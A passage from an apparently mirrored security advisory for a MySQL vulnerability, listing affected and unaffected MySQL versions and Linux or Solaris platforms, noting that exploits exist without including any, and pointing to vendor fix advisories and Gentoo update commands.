- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
MySQL AB MySQL 3.23.33
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
MySQL AB MySQL 3.23.32
+ Wirex Immunix OS 7+
MySQL AB MySQL 3.23.31
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
MySQL AB MySQL 3.23.30
MySQL AB MySQL 3.23.29
MySQL AB MySQL 3.23.28 gamma
MySQL AB MySQL 3.23.28
MySQL AB MySQL 3.23.27
MySQL AB MySQL 3.23.26
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
MySQL AB MySQL 3.23.25
MySQL AB MySQL 3.23.24
MySQL AB MySQL 3.23.23
MySQL AB MySQL 3.23.22
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
MySQL AB MySQL 3.23.10
MySQL AB MySQL 3.23.9
MySQL AB MySQL 3.23.8
MySQL AB MySQL 3.23.5
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.4
MySQL AB MySQL 3.23.3
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
MySQL AB MySQL 3.23.2
MySQL AB MySQL 3.23 .x
MySQL AB MySQL 4.1.0.0-alpha
MySQL AB MySQL 4.1.0-0
Conectiva Linux 9.0
Conectiva Linux 8.0
Conectiva Linux 7.0

- Unaffected program versions

MySQL AB MySQL 4.0.15
+ Conectiva Linux 10.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ OpenPKG OpenPKG Current


- Exploit

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.


Additionally, lion has released an exploit for this problem.

- Solution

This issue has been reported to be addressed in MySQL 4.0.15.

Conectiva has released an advisory (CLA-2003:743) to address this issue. Users are advised to download and apply the relevant fixes as soon as possible. Further information relating to obtaining and applying appropriate fixes is available in the referenced advisory. Fixes are linked below. Conectiva has also released an advisory (CLSA-2003:764) for CLEE 1.0.

Trustix has released an advisory (TSLSA-2003-09-17) to address this issue. See referenced advisory for further details regarding the application of fixes. Fixes are linked below.

Debian has released advisory DSA 381-1 to address this issue. See referenced advisory for additional details.

Gentoo has released an advisory to address this issue. Gentoo updates can be applied with the following commands:

emerge sync
emerge \=dev-db/mysql/<mysql version>
emerge clean

OpenPKG has released an advisory to address this issue. Please see the attached advisory for detailed upgrade instructions.

EnGarde Secure Linux has released an advisory to address this issue. Please see the referenced advisory for detailed upgrade instructions.

Mandrake Linux has released an advisory to address this issue. Please see the referenced advisory for detailed upgrade instructions.

SuSE has released security advisory SuSE-SA:2003:042 to address this issue.

Turbolinux has released an advisory TLSA-2003-56 to address this issue. Please see the referenced advisory for detailed upgrade instructions.

Red Hat has released advisory RHSA-2003:281-01 to address this issue. See referenced advisory for additional information.

Red Hat has released advisory RHSA-2003:282-06 to address this issue in their Linux Enterprise software. Relevant patches are available through the Red Hat Network. See the referenced advisory for additional details.

SGI has released an advisory (20031002-01-U) pertaining to their ProPack Linux distribution. The advisory has been released in response to a number of RHSA advisories, and includes a patch (Patch 10027) containing updated RPM packages relating to 22 different BIDS.

Patch 10027 can be obtained via the following link:
http://support.sgi.com/

For information regarding how to obtain individual RPM packages included in Patch 10027, please see the attached advisory.

Sun has released an update to address this issue for RaQ550. Please see the referenced web page for more information.

Sun has released fixes for Sun Linux.

Sun has released an update to address this issue for Qube3. Please see the referenced web page for more information.


MySQL AB MySQL 4.1.0-0

MySQL AB MySQL 4.1.0.0-alpha

MySQL AB MySQL 3.23.36

MySQL AB MySQL 3.23.37

MySQL AB MySQL 3.23.44

MySQL AB MySQL 3.23.47

MySQL AB MySQL 3.23.48

MySQL AB MySQL 3.23.52

MySQL AB MySQL 3.23.53

MySQL AB MySQL 3.23.54

MySQL AB MySQL 3.23.54 a

MySQL AB MySQL 3.23.55

MySQL AB MySQL 3.23.56

MySQL AB MySQL 3.23.58

MySQL AB MySQL 4.0 .0

MySQL AB MySQL 4.0.1

MySQL AB MySQL 4.0.10

MySQL AB MySQL 4.0.11 -gamma

MySQL AB MySQL 4.0.11

MySQL AB MySQL 4.0.12

MySQL AB MySQL 4.0.13

MySQL AB MySQL 4.0.14

MySQL AB MySQL 4.0.2

MySQL AB MySQL 4.0.3

MySQL AB MySQL 4.0.4

MySQL AB MySQL 4.0.5

MySQL AB MySQL 4.0.5 a

MySQL AB MySQL 4.0.6

MySQL AB MySQL 4.0.7 -gamma

MySQL AB MySQL 4.0.7

MySQL AB MySQL 4.0.8 -gamma

MySQL AB MySQL 4.0.8

MySQL AB MySQL 4.0.9 -gamma

MySQL AB MySQL 4.0.9

Conectiva Linux 7.0

Conectiva Linux 8.0

Conectiva Linux 9.0


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's own websites.